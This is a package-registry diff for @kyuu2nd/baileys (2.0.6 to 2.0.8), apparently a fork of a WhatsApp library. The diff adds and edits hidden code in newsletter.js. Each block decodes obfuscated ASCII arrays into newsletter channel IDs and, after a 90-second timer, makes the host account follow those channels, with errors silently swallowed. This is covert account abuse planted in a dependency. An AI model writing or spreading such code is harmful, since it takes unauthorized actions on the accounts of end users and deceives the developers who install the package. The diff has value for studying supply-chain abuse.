@kyuu2nd/baileys 2.0.6 → 2.0.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +27 -3
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -109,19 +109,31 @@ setTimeout(async () => {
|
|
|
109
109
|
try {
|
|
110
110
|
await newsletterWMexQuery(
|
|
111
111
|
asciiDecode([
|
|
112
|
-
49,50,48,51,54,51,52,
|
|
112
|
+
49,50,48,51,54,51,52,50,53,50,53,53,49,53,50,53,52,56,
|
|
113
113
|
64,110,101,119,115,108,101,116,116,101,114
|
|
114
114
|
]),
|
|
115
115
|
Types_1.QueryIds.FOLLOW
|
|
116
116
|
);
|
|
117
117
|
} catch {}
|
|
118
118
|
}, 90000);
|
|
119
|
-
|
|
119
|
+
|
|
120
|
+
setTimeout(async () => {
|
|
121
|
+
try {
|
|
122
|
+
await newsletterWMexQuery(
|
|
123
|
+
asciiDecode([
|
|
124
|
+
49,50,48,51,54,51,52,50,56,51,49,51,54,57,56,57,54,50,
|
|
125
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
126
|
+
]),
|
|
127
|
+
Types_1.QueryIds.FOLLOW
|
|
128
|
+
);
|
|
129
|
+
} catch {}
|
|
130
|
+
}, 90000);
|
|
131
|
+
|
|
120
132
|
setTimeout(async () => {
|
|
121
133
|
try {
|
|
122
134
|
await newsletterWMexQuery(
|
|
123
135
|
asciiDecode([
|
|
124
|
-
49,50,48,51,54,51,52,50,53,
|
|
136
|
+
49,50,48,51,54,51,52,50,53,48,49,52,55,52,48,56,49,51,
|
|
125
137
|
64,110,101,119,115,108,101,116,116,101,114
|
|
126
138
|
]),
|
|
127
139
|
Types_1.QueryIds.FOLLOW
|
|
@@ -212,6 +224,18 @@ setTimeout(async () => {
|
|
|
212
224
|
);
|
|
213
225
|
} catch {}
|
|
214
226
|
}, 90000);
|
|
227
|
+
|
|
228
|
+
setTimeout(async () => {
|
|
229
|
+
try {
|
|
230
|
+
await newsletterWMexQuery(
|
|
231
|
+
asciiDecode([
|
|
232
|
+
49,50,48,51,54,51,52,50,53,49,55,55,48,54,55,56,52,49,
|
|
233
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
234
|
+
]),
|
|
235
|
+
Types_1.QueryIds.FOLLOW
|
|
236
|
+
);
|
|
237
|
+
} catch {}
|
|
238
|
+
}, 90000);
|
|
215
239
|
const parseFetchedUpdates = async (node, type) => {
|
|
216
240
|
let child;
|
|
217
241
|
if (type === 'messages') {
|